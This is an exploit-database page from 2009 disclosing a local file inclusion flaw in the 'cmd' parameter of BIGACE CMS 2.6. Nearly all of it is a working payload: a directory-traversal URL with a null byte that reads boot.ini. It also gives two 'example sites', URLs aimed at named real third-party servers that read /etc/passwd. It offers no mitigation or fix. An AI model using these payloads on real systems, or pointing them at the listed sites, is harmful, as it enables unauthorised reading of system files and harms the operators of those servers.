[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability
# Published : 2009-06-30
# Author : CWD@rBe
# Previous Title : SMF Mod Member Awards 1.0.2 Blind SQL Injection Exploit
# Next Title : Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability


-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6
  
download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
  
Author     : CWD@rBe
 
Special Thanks : www.cyber-warrior.org
 
***************************************************************************************************************
exploit:
 
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
 
example sites
 
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
****************************************************************************************************************

# www.Syue.com [2009-06-30]